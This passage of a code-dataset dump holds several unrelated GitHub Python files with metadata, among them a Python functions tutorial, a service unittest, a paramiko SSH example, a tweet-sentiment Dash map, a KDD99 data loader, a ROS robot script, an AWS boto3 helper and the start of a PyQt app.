82, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 83, "usage_type": 
"call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "18153371816", "text": "# -*- coding: utf-8 -*-\n\nprint(int(\"123\"), int(12.34), str(123), bool(\"\"), bool(-1), bool(0))\n\nvar1 = 21\nvar2 = \"12\"\nprint(isinstance(var1, (int, float)), isinstance(var2, (int, str)))\n\nimport math\nfrom functools import reduce\n#两个返回值情况\ndef move(x, y, step, angle=0):\n nx = x + step * math.cos(angle)\n ny = y - step * math.sin(angle)\n return nx, ny\n\n#据说是默认参数最大一个坑\ndef add_end(L=[]):\n L.append(\"end\")\n return L\nprint(add_end())\nprint(add_end())\n\n#可变参数\ndef calc(*numbers):\n count = 0\n for n in numbers:\n count = count + n\n return count\nprint(calc(1, 2, 5))\nprint(calc())\n\ntheNums =[1 ,2 ,3 ,4 ,5]\nprint(calc(*theNums))\n\n#默认参数,关键字参数,可以混用\ndef fun(name ,age=18 ,score =80):\n print (\"name :%s , age :%d , score :%d\" % (name ,age ,score))\n\nfun('guo')\nfun('guo' ,20)\nfun('guo' ,score=100)\nfun(age=16 ,name='liao')\n\n#函数变量\nprint(\"函数变量\")\n\nfun1 = abs\nprint(fun1(-1))\n\ndef addFun(x ,y ,fun):\n return fun(x) +fun(y)\nprint(addFun(3 ,-5 ,abs))\n\ndef squr(x):\n return x *x\nprint(list(map(squr ,list(range(10)))))\n\nprint([x * x for x in [1, 2, 3, 4, 5, 6, 7, 8, 9]])\n\ndef add(x ,y):\n return x +y\nprint(reduce(add ,list(range(10))))\n\ndef str2int(s):\n def fn(x, y):\n return x * 10 + y\n def char2num(s):\n return {'0': 0, '1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9}[s]\n return reduce(fn, list(map(char2num, s)))\nprint(str2int(\"12355\"))\n\n#filter的处理函数返回bool值\ndef is_odd(n):\n return n % 2 == 1\nprint(list(filter(is_odd, [1, 2, 4, 5, 6, 9, 10, 15])))\n\n\nprint(sorted(['bob', 'about', 'Zoo', 'Credit']))\ndef cmp_ignore_case(s1, s2):\n u1 = s1.upper()\n u2 = s2.upper()\n if u1 < u2:\n return -1\n if u1 > u2:\n return 1\n return 0\nprint(sorted(['bob', 'about', 'Zoo', 'Credit'], cmp_ignore_case))\n\n\n\n\n\n\n", "repo_name": "artofree/study", "sub_path": "pythons/function.py", "file_name": "function.py", "file_ext": "py", "file_size_in_byte": 1898, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "math.cos", "line_number": 13, "usage_type": "call"}, {"api_name": "math.sin", "line_number": 14, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 63, "usage_type": "call"}, {"api_name": "functools.reduce", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "45175277314", "text": "import logging\nimport time\nimport unittest\n\nfrom jacalingest.engine.servicerunner import ServiceRunner\nfrom jacalingest.engine.configuration.configurationadapter import ConfigurationAdapter\nfrom jacalingest.engine.configuration.configurationmessage import ConfigurationMessage\n\nfrom jacalingest.engine.messaging.queuemessagingsystem import QueueMessagingSystem\nfrom jacalingest.engine.messaging.messager import Messager\nfrom jacalingest.engine.monitoringandcontrol.metrics import Metrics\nfrom jacalingest.engine.monitoringandcontrol.monitoradapter import MonitorAdapter\nfrom jacalingest.stringdomain.stringconcatenatorservice import StringConcatenatorService\nfrom jacalingest.stringdomain.stringmessage import StringMessage\n\nclass TestStringConcatenatorService(unittest.TestCase):\n\n @classmethod\n def setUpClass(self):\n logging.basicConfig(level=logging.INFO, format='%(threadName)s, %(module)s: %(message)s')\n\n def test(self):\n messaging_system=QueueMessagingSystem()\n messager = Messager()\n 
metrics_endpoint = messager.get_endpoint(messaging_system, \"metrics\", Metrics)\n first_endpoint = messager.get_endpoint(messaging_system, \"first\", StringMessage)\n second_endpoint = messager.get_endpoint(messaging_system, \"second\", StringMessage)\n concatenation_endpoint = messager.get_endpoint(messaging_system, \"concatenation\", StringMessage)\n control_endpoint = messager.get_endpoint(messaging_system, \"control\", StringMessage)\n\n parameters={\"name\":\"string_concatenator_service\", \"first_endpoint\":first_endpoint, \"second_endpoint\":second_endpoint, \"concatenation_endpoint\":concatenation_endpoint, \"control_endpoint\":control_endpoint}\n \n configuration_endpoint = messager.get_endpoint(messaging_system, \"configuration\", ConfigurationMessage)\n configuration_adapter = ConfigurationAdapter(StringConcatenatorService, parameters, configuration_endpoint)\n monitor_adapter = MonitorAdapter(configuration_adapter, metrics_endpoint)\n service_runner = ServiceRunner(monitor_adapter, messager)\n\n service_runner.start()\n time.sleep(5)\n\n logging.info(\"Publishing ConfigurationMessage\")\n configuration_message = ConfigurationMessage({})\n messager.publish(configuration_endpoint, configuration_message)\n\n time.sleep(5)\n\n logging.info(\"Publishing 'Start' control message\")\n messager.publish(control_endpoint, StringMessage(\"Start\"))\n\n time.sleep(5)\n\n logging.info(\"Publishing 'Stop' control message\")\n messager.publish(control_endpoint, StringMessage(\"Stop\"))\n\n time.sleep(5)\n\n service_runner.terminate()\n service_runner.wait()\n\nif __name__ == '__main__':\n unittest.main()\n\n", "repo_name": "ICRAR/jacal", "sub_path": "ingest/test/test_stringconcatenatorservice.py", "file_name": "test_stringconcatenatorservice.py", "file_ext": "py", "file_size_in_byte": 2761, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "unittest.TestCase", "line_number": 16, "usage_type": "attribute"}, {"api_name": "logging.basicConfig", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 20, "usage_type": "attribute"}, {"api_name": "jacalingest.engine.messaging.queuemessagingsystem.QueueMessagingSystem", "line_number": 23, "usage_type": "call"}, {"api_name": "jacalingest.engine.messaging.messager.Messager", "line_number": 24, "usage_type": "call"}, {"api_name": "jacalingest.engine.monitoringandcontrol.metrics.Metrics", "line_number": 25, "usage_type": "argument"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 26, "usage_type": "argument"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 27, "usage_type": "argument"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 28, "usage_type": "argument"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 29, "usage_type": "argument"}, {"api_name": "jacalingest.engine.configuration.configurationmessage.ConfigurationMessage", "line_number": 33, "usage_type": "argument"}, {"api_name": "jacalingest.engine.configuration.configurationadapter.ConfigurationAdapter", "line_number": 34, "usage_type": "call"}, {"api_name": "jacalingest.stringdomain.stringconcatenatorservice.StringConcatenatorService", "line_number": 34, "usage_type": "argument"}, {"api_name": "jacalingest.engine.monitoringandcontrol.monitoradapter.MonitorAdapter", "line_number": 35, "usage_type": "call"}, {"api_name": 
"jacalingest.engine.servicerunner.ServiceRunner", "line_number": 36, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 39, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 41, "usage_type": "call"}, {"api_name": "jacalingest.engine.configuration.configurationmessage.ConfigurationMessage", "line_number": 42, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 45, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 47, "usage_type": "call"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 48, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 50, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 52, "usage_type": "call"}, {"api_name": "jacalingest.stringdomain.stringmessage.StringMessage", "line_number": 53, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 55, "usage_type": "call"}, {"api_name": "unittest.main", "line_number": 61, "usage_type": "call"}]} +{"seq_id": "43385596106", "text": "#paramiko connect server use id_rsa\n#2019/08/21\n\nimport paramiko\n\nprivate = paramiko.RSAKey.from_private_key_file(r'C:\\Users\\陈文斌\\.ssh\\id_rsa')\n\nclient = paramiko.SSHClient()\nclient.set_missing_host_key_policy(paramiko.AutoAddPolicy())\nclient.connect(\n hostname='192.168.40.141',\n port=22,\n username='root',\n pkey=private\n)\n\nstdin,stdout,stderr = client.exec_command(command='sl',timeout=1)\nprint(stderr.read().decode('utf-8'))\n\nclient.close()\n\n", "repo_name": "SwordsDevil/gpcloud", "sub_path": "Day13/02.paramiko_rsa.py", "file_name": "02.paramiko_rsa.py", "file_ext": "py", "file_size_in_byte": 462, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "paramiko.RSAKey.from_private_key_file", "line_number": 6, "usage_type": "call"}, {"api_name": "paramiko.RSAKey", "line_number": 6, "usage_type": "attribute"}, {"api_name": "paramiko.SSHClient", "line_number": 8, "usage_type": "call"}, {"api_name": "paramiko.AutoAddPolicy", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "27832545947", "text": "\"\"\"\nYour task is to create a function that given a sequence and a predicate,\nreturns True if only some (but not all) elements in the sequence are True\nafter applying the predicate\n\"\"\"\nfrom typing import Callable\n\n\ndef some_basic(string: str, function: Callable) -> bool:\n \"\"\"Check if some elements in a string match the function (basic).\n\n Args:\n string: string to verify.\n function: function to call.\n\n Returns:\n True if some of elements are in the sequence are True.\n\n Examples:\n >>> assert some_basic('abcdefg&%$', str.isalpha)\n >>> assert not some_basic('&%$=', str.isalpha)\n \"\"\"\n match: int = 0\n for next_string in string: # type: str\n if function(next_string):\n match += 1\n return len(string) > match > 0\n\n\ndef some_func(string: str, function: Callable) -> bool:\n \"\"\"Check if some elements in a string match the function (functional).\n\n Args:\n string: string to verify.\n function: function to call.\n\n Returns:\n True if some of elements are in the sequence are True.\n\n Examples:\n >>> assert some_func('abcdefg&%$', str.isalpha)\n >>> assert not some_func('&%$=', str.isalpha)\n \"\"\"\n return any(map(function, string)) and not all(map(function, string))\n\n\nif __name__ == '__main__':\n print(some_basic('abcdefg', str.isalpha))\n print(some_func('abcdefg', str.isalpha))\n", "repo_name": "vyahello/upgrade-python-kata", "sub_path": 
"kata/07/some.py", "file_name": "some.py", "file_ext": "py", "file_size_in_byte": 1440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "typing.Callable", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "11107562318", "text": "import os\nimport dash\nimport dash_html_components as html\nimport dash_core_components as dcc\n# from dash.dependencies import Output, Event, Input\nfrom WatchDogs_MongoWrapper import MongoWrapper\nimport requests\nimport json\nimport pandas as pd\nfrom pandas.io.json import json_normalize\n# from geopy.geocoders import Nominatim\n\napp = dash.Dash(__name__)\n\nserver = app.server\n\napp.layout = html.Div(style={'background':'#2f3239'}, children=[\n dcc.Dropdown(\n style={\n 'backgroundColor':'#f8f8f8', 'borderColor':'#2f3239', 'borderRadius':'5px', 'fontFamily':'Roboto', 'height':'35px', 'width':'150px'\n },\n value='Microsoft',\n id='my_dropdown',\n placeholder='Select a stock',\n options=[\n {'label': 'Microsoft', 'value': 'Microsoft'},\n {'label': 'Facebook', 'value': 'Facebook'}, \n {'label': 'Visa', 'value': 'Visa'},\n {'label': 'Nvidia', 'value': 'Nvidia'},\n {'label': 'Google', 'value': 'Google'},\n {'label': 'Nike', 'value': 'Nike'},\n {'label': 'Alibaba', 'value': 'Alibaba'},\n {'label': 'Netflix', 'value': 'Netflix'},\n {'label': 'PayPal', 'value': 'PayPal'},\n {'label': 'Ebay', 'value': 'Ebay'},\n {'label': 'Tesla', 'value': 'Tesla'},\n {'label': 'Twitter', 'value': 'Twitter'},\n {'label': 'Disney', 'value': 'Disney'},\n {'label': 'Pepsi', 'value': 'Pepsi'},\n {'label': 'Lyft', 'value': 'Lyft'},\n {'label': 'Chevron', 'value': 'Chevron'},\n {'label': 'Cisco', 'value': 'Cisco'},\n {'label': 'Intel', 'value': 'Intel'},\n {'label': 'Verizon', 'value': 'Verizon'},\n {'label': 'AT&T', 'value': 'AT&T'},\n {'label': 'Nokia', 'value': 'Nokia'},\n {'label': 'Comcast', 'value': 'Comcast'},\n {'label': 'Kroger', 'value': 'Kroger'},\n {'label': 'Boeing', 'value': 'Boeing'},\n {'label': 'Starbucks', 'value': 'Starbucks'},\n {'label': 'Walmart', 'value': 'Walmart'},\n {'label': 'Adobe', 'value': 'Adobe'},\n {'label': 'Dell', 'value': 'Dell'},\n {'label': 'Ford', 'value': 'Ford'},\n {'label': 'Samsung', 'value': 'Samsung'},\n ]\n ),\n \n html.Div(id='output-container', style={'backgroundColor':'transparent'}),\n\n])\n\n@app.callback(\n dash.dependencies.Output('output-container', 'children'),\n [dash.dependencies.Input('my_dropdown', 'value')]\n )\n\n\ndef update_graph_live(value):\n\n # response = requests.get(\"http://104.154.230.56/api/get_tweets_with_lat_long/{}\".format(value))\n # data = response.json()\n # pretty = pd.DataFrame()\n\n # df_sent = pd.DataFrame.from_dict(json_normalize(data['Sentiment_Value']), orient='columns')\n # df_lat = pd.DataFrame.from_dict(json_normalize(data['Latitude']), orient='columns')\n # df_long = pd.DataFrame.from_dict(json_normalize(data['Longitude']), orient='columns')\n # df_tweet = pd.DataFrame.from_dict(json_normalize(data['Tweet_Text']), orient='columns')\n\n # sent_list = df_sent.iloc[0].tolist()\n # lat_list = df_lat.iloc[0].tolist()\n # long_list = df_long.iloc[0].tolist()\n # tweet_list = df_tweet.iloc[0].tolist()\n\n # pretty['Sentiment'] = sent_list\n # pretty['Latitude'] = lat_list\n # pretty['Longitude'] = long_list\n # pretty['Tweet'] = tweet_list\n \n response_latlong = requests.get(\"http://104.154.230.56/api/get_tweets_with_lat_long/{}\".format(value))\n 
data = response_latlong.json()\n pretty = json_normalize(data)\n\n totalSentiment = pretty['Sentiment_Value']\n totalLongitude = pretty['Longitude']\n totalLatitude = pretty['Latitude']\n totalTweet = pretty['Tweet_Text']\n\n tots2 = totalSentiment.count()\n\n scl = [ [0,\"rgb(39,174,96)\"],[0.35,\"rgb(46,204,113)\"],[0.5,\"rgb(241,196,15)\"],\\\n [0.6,\"rgb(243,156,18)\"],[0.7,\"rgb(231,76,60)\"],[1,\"rgb(192,57,43)\"] ]\n\n return dcc.Graph(\n style={'height': '900px'},\n figure={\n 'data' :[{\n 'type':'scattergeo',\n # 'locationmode':'USA-states',\n 'lon' : totalLongitude,\n 'lat' : totalLatitude,\n 'text' : totalTweet,\n 'mode':'markers',\n 'marker':{ \n 'size':10, \n # 'opacity':1,\n 'reversescale':True,\n 'autocolorscale':False,\n 'symbol':'circle-open',\n 'line':{\n 'width':1.5,\n 'color':'rgba(150, 150, 150)'\n },\n 'colorscale' : scl,\n 'cmin' : -1,\n 'color' : totalSentiment,\n 'cmax' : 1,\n 'colorbar':{\n 'title':{\n 'text':\"Polarity Scale\",\n 'font':{\n 'size':14,\n },\n },\n 'thickness':20,\n 'titleside' : \"right\",\n 'ticks' : \"outside\",\n 'ticklen' : 3,\n 'tickfont':{\n 'size':10,\n },\n # 'showticksuffix' : \"last\",\n # 'ticksuffix' : \" inches\",\n 'dtick' : 0.1\n }\n }\n }],\n\n 'layout' :{\n # 'legend':{\n # 'orientation': 'h',\n # },\n 'paper_bgcolor':'#2f3239',\n 'plot_bgcolor':'#2f3239',\n 'title': \"Twitter Sentiment for {}\\n\".format(value), \n 'font':{\n 'size':15,\n 'color': '#f8f8f8',\n },\n 'geo' :{\n # 'scope':'usa',\n # 'projection':dict( 'type'='albers usa' ),\n 'showland' : True,\n 'bgcolor': '#2f3239', \n 'landcolor' : \"#2f3239\",\n 'subunitcolor' : \"#2f3239\",\n 'countrycolor' : \"#f8f8f8\",\n 'coastlinewidth': 0.5,\n 'countrywidth' : 0.5,\n 'subunitwidth' : 1,\n 'showsubunits': True,\n 'showcountries':True,\n 'showcoastlines':True,\n 'coastlinecolor':\"#f8f8f8\",\n 'showframe':False,\n # 'framecolor': \"rgb(155, 155, 155)\"\n 'showocean':True,\n 'oceancolor':\"#2f3239\"\n # 'showlakes':True \n },\n } \n }\n ), \n # html.Div(children='Total Tweets pulled for searchword: {}.\\n'.format(tots2))\n \nif __name__ == '__main__':\n app.run_server(debug=True)\n", "repo_name": "prashanth-thipparthi/WatchDogs_StockMarketAnalysis", "sub_path": "WatchDogs_Visualisation/newApps/MapNew.py", "file_name": "MapNew.py", "file_ext": "py", "file_size_in_byte": 7143, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "41", "api": [{"api_name": "dash.Dash", "line_number": 13, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 17, "usage_type": "call"}, {"api_name": "dash_core_components.Dropdown", "line_number": 18, "usage_type": "call"}, {"api_name": "dash_html_components.Div", "line_number": 59, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 90, "usage_type": "call"}, {"api_name": "pandas.io.json.json_normalize", "line_number": 92, "usage_type": "call"}, {"api_name": "dash_core_components.Graph", "line_number": 104, "usage_type": "call"}, {"api_name": "dash.dependencies.Output", "line_number": 64, "usage_type": "call"}, {"api_name": "dash.dependencies", "line_number": 64, "usage_type": "attribute"}, {"api_name": "dash.dependencies.Input", "line_number": 65, "usage_type": "call"}, {"api_name": "dash.dependencies", "line_number": 65, "usage_type": "attribute"}]} +{"seq_id": "69923343805", "text": "import torch\nimport os\nimport random\nfrom torch.utils.data import Dataset\nfrom torch.utils.data import DataLoader\nfrom torchvision import transforms\nfrom 
torchvision.datasets import ImageFolder\nfrom PIL import Image\nimport h5py\nimport numpy as np\nimport collections\nimport numbers\nimport math\nimport pandas as pd\nclass KDD99Loader(object):\n    def __init__(self, data_path, mode=\"train\"):\n        self.mode=mode\n        data = np.load(data_path)\n\n        labels = data[\"kdd\"][:,-1]\n        features = data[\"kdd\"][:,:-1]\n        N, D = features.shape\n        \n        normal_data = features[labels==1]\n        normal_labels = labels[labels==1]\n\n        N_normal = normal_data.shape[0]\n\n        attack_data = features[labels==0]\n        attack_labels = labels[labels==0]\n\n        N_attack = attack_data.shape[0]\n\n        randIdx = np.arange(N_attack)\n        np.random.shuffle(randIdx)\n        N_train = N_attack // 2\n\n        self.train = attack_data[randIdx[:N_train]]\n        self.train_labels = attack_labels[randIdx[:N_train]]\n\n        self.test = attack_data[randIdx[N_train:]]\n        self.test_labels = attack_labels[randIdx[N_train:]]\n\n        self.test = np.concatenate((self.test, normal_data),axis=0)\n        self.test_labels = np.concatenate((self.test_labels, normal_labels),axis=0)\n\n\n    def __len__(self):\n        \"\"\"\n        Number of samples in the dataset.\n        \"\"\"\n        if self.mode == \"train\":\n            return self.train.shape[0]\n        else:\n            return self.test.shape[0]\n\n\n    def __getitem__(self, index):\n        if self.mode == \"train\":\n            return np.float32(self.train[index]), np.float32(self.train_labels[index])\n        else:\n            return np.float32(self.test[index]), np.float32(self.test_labels[index])\n        \n\ndef get_loader(data_path, batch_size, mode='train'):\n    \"\"\"Build and return data loader.\"\"\"\n\n    dataset = KDD99Loader(data_path, mode)\n\n    shuffle = False\n    if mode == 'train':\n        shuffle = True\n\n    data_loader = DataLoader(dataset=dataset,\n                             batch_size=batch_size,\n                             shuffle=shuffle)\n    return data_loader\n", "repo_name": "danieltan07/dagmm", "sub_path": "data_loader.py", "file_name": "data_loader.py", "file_ext": "py", "file_size_in_byte": 2153, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 370, "dataset": "github-code", "pt": "41", "api": [{"api_name": "numpy.load", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.random.shuffle", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 45, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 62, "usage_type": "call"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 74, "usage_type": "call"}]} +{"seq_id": "1184117437", "text": "import rospy\nimport tf\nimport time\nimport numpy as np\nfrom std_msgs.msg import String\n\n\nclass Simple_strategy():\n    def __init__(self, stm_pub, res_sub):\n        self.stm_pub = stm_pub\n        self.rate = rospy.Rate(30)\n        self.listener = tf.TransformListener()\n        self.id = 0\n        self.is_response = False\n        rospy.Subscriber(res_sub, String, self.response_callback)\n\n    def get_next_id(self):\n        self.id += 1\n        return self.id\n\n    def start_stm_cmd(self, cmd, with_response=True):\n        self.get_next_id()\n        self.is_response = False\n        self.stm_pub.publish(str(self.id) + \" \" + cmd)\n        if with_response:\n            while not self.is_response and not rospy.is_shutdown():\n                self.rate.sleep()\n\n    def take_angle(self):\n        (trans, rot) = self.listener.lookupTransform('map', 'secondary_robot', rospy.Time(0))\n        yaw = 
tf.transformations.euler_from_quaternion(rot)[2]\n        return yaw\n\n    def take_coord(self):\n        (trans, rot) = self.listener.lookupTransform('map', 'secondary_robot', rospy.Time(0))\n        return np.array(trans[:2])\n\n    def move_on_angle(self, target_angle):\n        self_angle = self.take_angle()\n        da = (target_angle - self_angle) % (2 * np.pi)\n        if da > np.pi:\n            da = da - 2 * np.pi\n        else:\n            da = da\n        self.start_stm_cmd(\"0 0 \" + str(da) + \" 0 0 1\")\n\n    def response_callback(self, data):\n        data_splitted = data.data.split()\n        if data_splitted[0] == str(self.id) and data_splitted[1] == \"finished\":\n            self.is_response = True\n\n    def move_on_point(self, target_point):\n        self_point = self.take_coord()\n        angle = self.take_angle()\n        dl = target_point - self_point\n        dl[0], dl[1] = dl[0] * np.cos(angle) + dl[1] * np.sin(angle), -dl[0] * np.sin(angle) + dl[1] * np.cos(angle)\n        dt = np.max(dl / np.array([0.2, 0.2]))\n        v = np.abs(dl / dt)\n        self.start_stm_cmd(str(dl[0]) + \" \" + str(dl[1]) + \" 0 \" + str(v[0]) + \" \" + str(v[1]) + \" 0\")\n\n    def start(self):\n        self.move_on_angle(4.71)\n        self.move_on_point(np.array([0.2, 0.5]))\n        self.start_stm_cmd(\"8 -0.1 0 0\")\n        time.sleep(4)\n        self.start_stm_cmd(\"8 0 0 0\")\n\n", "repo_name": "SkoltechRobotics/ros-eurobot-2018", "sub_path": "eurobot_decision_maker/scripts/simple_secondary.py", "file_name": "simple_secondary.py", "file_ext": "py", "file_size_in_byte": 2254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "rospy.Rate", "line_number": 11, "usage_type": "call"}, {"api_name": "tf.TransformListener", "line_number": 12, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 15, "usage_type": "call"}, {"api_name": "std_msgs.msg.String", "line_number": 15, "usage_type": "argument"}, {"api_name": "rospy.is_shutdown", "line_number": 26, "usage_type": "call"}, {"api_name": "rospy.Time", "line_number": 30, "usage_type": "call"}, {"api_name": "tf.transformations.euler_from_quaternion", "line_number": 31, "usage_type": "call"}, {"api_name": "tf.transformations", "line_number": 31, "usage_type": "attribute"}, {"api_name": "rospy.Time", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 40, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 41, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 42, "usage_type": "attribute"}, {"api_name": "numpy.cos", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.sin", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 63, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "21622621774", "text": "from ast import Attribute\nimport base64\nfrom pyclbr import Function\nimport boto3\nfrom botocore.exceptions import ClientError\nimport json\nimport hashlib\n\nclass aws_config():\n    AWS_ACCESS_KEY_ID = \"*********************\"\n    AWS_SECRET_ACCESS_KEY = \"*******************\"\n    REGION_NAME = \"us-east-1\"\n\n\nclass s3_client():\n    def __init__(self):\n        self.client = boto3.client('s3',\n            aws_access_key_id = aws_config.AWS_ACCESS_KEY_ID,\n            aws_secret_access_key = aws_config.AWS_SECRET_ACCESS_KEY,\n            region_name = 
aws_config.REGION_NAME)\n        self.bucketName = \"ece1779-bucket-a3\"\n\n    def upload(self, fname, key):\n        self.client.put_object(Body=fname, Bucket=self.bucketName, Key = key)\n        print(\"Successfully uploaded!\")\n\n    def fetch_file(self, key):\n        try:\n            res = self.client.get_object(Bucket = self.bucketName, Key = key)\n            print(\"Successfully fetched!\")\n            f_content = base64.b64encode(res['Body'].read()).decode()\n            return f_content\n        except ClientError as e:\n            print(\"Error\", e)\n            return e\n\nclass dynamodb():\n    def __init__(self):\n        self.session = boto3.Session(\n            aws_access_key_id = aws_config.AWS_ACCESS_KEY_ID,\n            aws_secret_access_key = aws_config.AWS_SECRET_ACCESS_KEY,\n            region_name = aws_config.REGION_NAME)\n        self.dynamodb = self.session.resource('dynamodb')\n        self.client = self.session.client('dynamodb')\n\n    def create_table(self, tname, primary_key, primary_key_type):\n        table = self.dynamodb.create_table(\n            TableName=tname,\n            KeySchema=[\n                {\n                    'AttributeName': primary_key,\n                    'KeyType': 'HASH' #Partition key\n                }\n            ],\n            AttributeDefinitions=[\n                {\n                    'AttributeName': primary_key,\n                    'AttributeType': primary_key_type\n                }, \n            ],\n            ProvisionedThroughput={\n                'ReadCapacityUnits': 5,\n                'WriteCapacityUnits': 5\n            },\n            Tags=[\n                {\n                    'Key': 'TableName',\n                    'Value': tname\n                }\n            ]\n        )\n\n        table.meta.client.get_waiter('table_exists').wait(TableName=tname)\n        print(\"Table created!\")\n        return \n    \n    def get_info(self, table_name, primary_key, key_value):\n        table = self.dynamodb.Table(table_name)\n        try:\n            response = table.get_item(\n                Key={\n                    primary_key: key_value\n                }\n            )\n        except ClientError as e:\n            print(e.response['Error']['Message'])\n        else:\n            item = response['Item']\n            print('Successfully retrieved item')\n            return item\n        return None\n\n    def insert_into_table(self, tname, data): # (string, dict) -> None\n        table = self.dynamodb.Table(tname)\n        print(\"data is: \", data)\n        table.put_item(\n            Item=data\n        )\n        print(\"Successfully inserted data into {} table\".format(tname))\n        return\n\n    def verify_username(self, uname, pw):\n        table = self.dynamodb.Table('account_info')\n        response = table.get_item(\n            Key={\n                'username': uname\n            }\n        )\n        if 'Item' not in response:\n            print('Invalid username')\n            return 0\n        print(response['Item'])\n        #print('Entered password: ', pw)\n        response = self.get_info('account_info', 'username', uname)\n        db_hpw = response['password']\n        hpw = hashlib.sha256(pw.encode()).hexdigest()\n        print('Hashed entered password: ', hpw)\n        print('Password in DB: ', db_hpw)\n        return 1 if db_hpw == hpw else 0\n\n    def create_account(self, uname, pw):\n        l_table = self.client.list_tables()['TableNames']\n        #runs the first time to create an Accounts table\n        if 'account_info' not in l_table:\n            self.create_table('account_info', 'username', 'S')\n\n        hpw = hashlib.sha256(pw.encode()).hexdigest()\n        new_account = {'username': uname, 'password': hpw}\n        print(\"New Account is: \", new_account)\n        self.insert_into_table('account_info', new_account)\n\nclass lambda_client():\n    def __init__(self):\n        self.client = boto3.client('lambda',\n            aws_access_key_id = aws_config.AWS_ACCESS_KEY_ID,\n            aws_secret_access_key = aws_config.AWS_SECRET_ACCESS_KEY,\n            region_name = aws_config.REGION_NAME)\n\n    def invoke(self, fname, data):\n        json_data = json.dumps(data, default=str)\n        return self.client.invoke(FunctionName = fname, Payload = json_data)\n", "repo_name": "suaad28/Cloud_Computing", "sub_path": "Web Scraping Final Project/Lambda_1/aws.py", "file_name": "aws.py", "file_ext": "py", "file_size_in_byte": 4796, "program_lang": "python", 
"lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "boto3.client", "line_number": 17, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 31, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 33, "usage_type": "name"}, {"api_name": "boto3.Session", "line_number": 39, "usage_type": "call"}, {"api_name": "botocore.exceptions.ClientError", "line_number": 85, "usage_type": "name"}, {"api_name": "hashlib.sha256", "line_number": 116, "usage_type": "call"}, {"api_name": "hashlib.sha256", "line_number": 127, "usage_type": "call"}, {"api_name": "boto3.client", "line_number": 134, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "2953701746", "text": "from PyQt6.QtWidgets import QApplication, QLabel, QPushButton, QWidget, \\\n QMainWindow, QVBoxLayout, QHBoxLayout, QComboBox, QMessageBox\nfrom PyQt6.QtGui import QFont, QFontDatabase, QIcon\nfrom PyQt6 import QtCore\nfrom PyQt6.QtGui import QCursor\nimport sys\nfrom papering_def import openUrl\nfrom papering_database import PaperData\n\n\nclass Main(QMainWindow):\n def __init__(self):\n super().__init__()\n\n # setting the Vbox layout\n v_layout = QVBoxLayout()\n subject_layout = QVBoxLayout()\n year_layout = QVBoxLayout()\n season_layout = QVBoxLayout()\n paper_layout = QVBoxLayout()\n selection_layout = QHBoxLayout()\n\n self.setWindowTitle(\"PAPERING\")\n self.setFixedWidth(600)\n self.setFixedHeight(450)\n self.setStyleSheet(\"background: #F7F6F3;\")\n\n QFontDatabase.addApplicationFont(\"./fonts/ShareTech-Regular.ttf\")\n QFontDatabase.addApplicationFont(\"./fonts/Audiowide-Regular.ttf\")\n self.font = 